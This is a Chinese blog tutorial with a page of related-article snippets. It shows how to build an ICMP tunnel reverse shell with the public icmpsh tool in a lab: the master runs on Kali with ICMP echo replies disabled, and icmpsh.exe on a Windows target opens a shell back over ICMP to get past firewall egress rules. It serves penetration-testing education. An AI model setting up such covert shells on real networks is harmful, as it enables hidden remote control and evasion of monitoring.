【内网流量操控技术六】icmp隧道之icmpsh

最新推荐文章于 2024-03-28 22:18:44 发布
最新推荐文章于 2024-03-28 22:18:44 发布
阅读量1.6k 收藏 3
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/redwand/article/details/113791092
版权

前言

今天是大年三十,先给大家拜个早年,虽然是年末最后一天,但对于有技术信仰的我们来说,其实每一天都是第0天,遂积跬步,记录一篇。前面我们学习了ssh隧道、dns隧道,这些隧道从tcp/ip七层协议来看,多是通过应用层或传输层协议穿透防火墙。那么当防火墙如果不开任何端口,我们应该如何穿透绕过防火墙出站规则呢,本节我们通过学习icmpsh来解决服务器未开端口时,如何通过icmp隧道穿透防火墙,其原理虽然简单,但动手一试发现有很多坑值得避免。

一、icmp隧道原理

前面说到,icmp隧道实战中多用于服务器未开启任何端口时,但双方能够通过icmp协议通讯,即能够ping通对方。因此我们设计实验拓扑如下:
在这里插入图片描述

二、环境配置

1.攻击机kali配置(master)

icmpsh软件虽然不通过TCP协议通讯,但它依然是基于C/S架构开发的,因此我们在服务端攻击机kali进行如下配置
首先从github上clone项目到本地

git clone https://github.com/inquisb/icmpsh.git

安装依赖库python-impacket

apt-get install python-impacket

安装python-impacket遇到报错

┌──(root💀kali20204)-[~/icmpsh]
└─# apt-get install python-impacket                                                                                                                                              1 ⨯
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package python-impacket is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
  python3-impacket impacket-scripts

这里提示安装python3-impacket,但icmpsh软件是基于python2开发的,因此必须要安装python-impacket,从github上下载impacket并安装。

git clone https://github.com/SecureAuthCorp/impacket.git

cd impacket 
python setup.py install

设置icmp_echo报文忽略不响应。如果不设置,攻击机可以收到靶机反馈的信息,但靶机将无法收到攻击机发出的指令。

sysctl -w net.ipv4.icmp_echo_ignore_all=1

此时再进入icmpsh目录执行命令,即可,这里的python是2.X版本,第一个参数是攻击机ip,第二个参数是防火墙WAN口ip。

python icmpsh_m.py 192.168.0.164 192.168.0.165

对于防火墙WAN口IP,我们在内网通过命令ipconfig是无法获得的。因此,我们可以通过ping命令,从内网主机ping攻击机,再在攻击机上抓包,从而获取WAN口IP地址。
通过目录查看,我们知道,对于icmpsh软件,在服务端(攻击机)可以一般运行在*unix操作系统,可以通过C语言、perl语言和python2环境运行。

┌──(root💀kali20204)-[~/icmpsh]
└─# ls
icmpsh.exe  icmpsh-m.c  icmpsh-m.pl  icmpsh_m.py  icmpsh-s.c  README.md  run.sh  screenshots

2.靶机配置(slave)

对于靶机icmpsh软件只提供了对于windows靶机的二进制文件icmpsh.exe,即此软件只适合靶机是windows操作系统,攻击机是*unix操作系统的环境。靶机运行命令如下:

icmpsh.exe -t 192.168.0.164

攻击机界面返回shell

┌──(root💀kali20204)-[~/icmpsh]
└─# python icmpsh_m.py 192.168.0.164 192.168.0.165                                                                                                                               1 ⨯
Microsoft Windows [°汾 5.2.3790]
(C) °爨̹Ԑ 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\؀Ħ>Microsoft Windows [°汾 5.2.3790]
'Microsoft' ²»ˇŚ²¿»󎢲¿ļ®£¬Ҳ²»ˇ¿ʔ̐еij͐ 
»󆺴¦mτ¼þ¡£

总结

icmpsh原理简单,但其应用广泛,虽然已经出现多年,但越来越多红队人员发现icmp协议其实对逃避流量监测有着很好的隐蔽作用。我们可以通过学习,触类旁通,用icmp协议封装传输数据,在其他的渗透测试活动中发挥更大的威力。

redwand
关注
专栏目录
内网隧道代理技术(二十)之 搭建ICMP隧道上线CS
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-15 424
ICMP隧道简单实用,是一个比较特殊的协议。在一般的里,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要。最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相应的回复与请求。
内网隧道代理技术(二十五)之 ICMP隧道反弹SHELL
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-14 308
由于ICMP报文自身可以携带数据,而且ICMP报文是由系统内核处理的,不占用任何端口,因此具有很高的隐蔽性。把数据隐藏在ICMP数据包包头的data字段中,建立隐蔽通道,可以实现绕过防火墙和入侵检测系统的阻拦。
内网渗透系列:内网隧道icmptunnel(jamesbarlow师傅的)
闵行小鱼塘
04-10 1722
本文研究ICMP隧道的一个工具,jamesbarlow师傅的icmptunnel
利用icmpsh建立icmp隧道反弹shell
xj28555的博客
09-25 754
首先在kali上安装icmpsh软件,软件地址https://github.com/inquisb/icmpsh.git 我们可以直接用git克隆过来git clonehttps://github.com/inquisb/icmpsh.git 然后我们还需要来安装python-impacket类库以保证对TCP、UDP、ICMP等协议的访问 pip2 install impacket 接下来我们还需要关闭我们之前的ping命令应答程序,这样可以防止内核自己对ping包进行响应。 sysc.
内网渗透系列:内网隧道icmpsh
闵行小鱼塘
04-10 1436
本文研究ICMP隧道的一个工具,icmpsh
icmp隧道--icmpsh
ddr12231的博客
09-24 299
本地:ubantu 目标主机:windows 在ubantu上关闭自带的icmp回应 sysctl -w net.ipv4.icmp_echo_ighore_all=1 ubantu上启动 pip install impacket python icmpsh_m.py ubantuIP WindowsIP windows上 icmpsh.exe -t UbantuIP 详细命令 -t...
icmpsh:基于 ICMP 的 shell 工具
gitblog_00096的博客
03-14 424
icmpsh:基于 ICMP 的 shell 工具 icmpsh 是一个基于 ICMP(Internet Control Message Protocol)的 shell 工具,它允许你通过 ICMP 请求在目标主机上执行命令并获取结果。 什么是 ICMPICMP(Internet Control Message Protocol)是 Internet 协议簇的一部分,用于在网络中发送控制...
icmpsh使用
守拙的博客
07-11 1032
ICMP隧道:将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(防火墙通常不会过滤ping数据包),通常用于内网攻击中的绕过防火墙建立C2tongda。 常用的ICMP隧道工具有icmpsh、PingTunnel、icmptunnel、powershell icmp等。 下载地址:https://github.com/bdamele/icmpsh 使用前提: 目标主机为windows系统 本地机器安装python2环境,安装impacket类库 利用icmpsh
流量代理之reGeorg内网穿透工具包.zip
01-13
关于通过reGeorg建立HTTP隧道的作用体现在,当我们能通过外网访问服务器A,但是我们并不能与位于内网的主机交互,这时reGeorg就派上了用场,假设此时我们拿到了服务器A的webshell,但是该内网主机的icmp、DNS、tcp和...
第70天:内网安全-域横向内网漫游Socks代理隧道技术1
08-03
内网安全是信息技术领域中的一个重要话题,特别是在企业网络环境中,域横向内网漫游Socks代理隧道技术是一种解决内网间通信难题的有效方法。本文将详细介绍相关知识点,并通过实际案例来展示如何应用这些技术。 ...
icmpsh.zip
05-17
内部网络中的大多数系统都位于防火墙和公司代理之后,以便控制入站和出站Internet流量。防火墙可以阻止反向并绑定TCP连接。但是大多数情况下允许ICMP流量。因此,可以将此协议用作隐蔽通道,以便获取shell并在目标主机上远程执行命令。
icmpsh搭建icmp隧道
hentai_uncle的博客
09-11 470
icmp隧道 icmpsh 使用kali作为攻击机, 使用win7作为受害机 kali安装icmpsh git clone https://github.com/inquisb/icmpsh.git apt-get install python-impacket //这步很可能存在问题 问题的解决方式: cp /etc/apt/sources.list /etc/apt/sources.list.bak //备份 vim /etc/apt/sources.list
icmpsh建立ICMP隧道
大方子
01-27 4792
Kali:192.168.61.145 Win7:192.168.61.128 Kali上先下载icmpsh git clone https://github.com/inquisb/icmpsh.git 安装python-impacket apt-get install python-impacket 关闭Kali系统自己的ping回复(实验完成后,记得设回0) 然后进入icmpsh文件夹内执行 # python icmpsh_m.py [攻击机IP][目标IP] python icmpsh_m
内网穿透_ICMP_icmpsh
最新发布
tubug的博客
03-28 1011
常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。数据包(例如:ping操作)的传输过程中,当目标主机不可达,或者请求超时,都是ICMP在运作(生成相应的错误信息)这样,当其他设备向你的机器发送 ICMP 请求时,icmpsh 可以截获这些请求并作出响应,而不是系统本身去响应。使用 icmpsh 工具时,它会监听网络上的 ICMP 请求,并模拟系统的 ICMP 去响应。为了防止系统本身去响应icmp,所以要关闭本机的icmp响应。
icmp协议_利用ICMP(icmpsh)协议反弹Shell 渗透红队笔记
weixin_39872257的博客
12-01 354
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 十篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),每周一更。ICMP隧道ICMP隧道是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定要开放端口,而在ICMP协议下就不需要。最常见的ICMP消息为Ping命令的回复,攻击者可以利用命令得到比回复更多的ICMP请求。在通常情况下...
icmp反弹协议——icmpsh
weixin_50683638的博客
04-08 345
ICMP隧道 前言 一、ICMP(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。 常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。 内容 开启两台虚拟机这里用到的是kali和
【渗透测试】ICMP隧道技术icmpsh使用
SunnyCat
09-28 2125
【渗透测试】ICMP隧道技术icmpsh使用 一、使用场景 icmp隧道技术多用于服务器未开启任何端口时,但能够通过icmp协议通讯,即能够ping通对方 二、icmpsh icmpsh是一个简单的ICMP反弹shell工具,拥有用C,Perl和Python实现的POSIX兼容主控端和一个win32的受控端。相比其他类似的开源工具来说,icmpsh的优点是在目标机器上运行时不需要管理员权限。 这一工具干净、简单并且便携。受控端(客户端)使用C语言实现。只能运行在目标Windows机器上,而主控端(服务端)
ICMP隧道穿透原理
afei001
12-13 540
目录 1.前言 2.ICMP隧道原理拓扑 3.ICMP隧道优缺点 4.ICMP实现隧道技术原理 4.1 icmp报文结构 4.2 Windows下icmp数据传输(32 bytes) 4.3 Linux下icmp数据传输(48 bytes) 4.4 ICMP隧道穿透原理 1.前言 现在,相对渗透而言,内网穿透中流量传输如何能躲避防御系统的拦截是需要考虑的。传统的socket隧道能用的极少,大量TCP、UDP流量被防御系统拦截。dns、icmp、http/https...
icmpsh解决运行报错
weixin_30655219的博客
11-22 551
运行./run.sh报错 sysctl -w net.ipv4.icmp_echo_ignore_all=1 >/dev/null python icmpsh_m.py 攻击机ip 目标机ip 目标机运行:icmpsh.exe -t 攻击机ip -d 500 -b 30 -s 128 转载于:https://www.cnblogs.com/websecyw/p/10001...
2020内网安全攻防实战:ICMP隧道与环境配置详解
本篇内容主要探讨的是AHZY-内网安全攻防知识分享中2020年1月12日的第章节——"再看ICMP隧道"。在内网安全的攻防战中, ICMP隧道是一种重要的技术手段,特别是在服务器没有开启任何公开端口的情况下,当两台设备...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值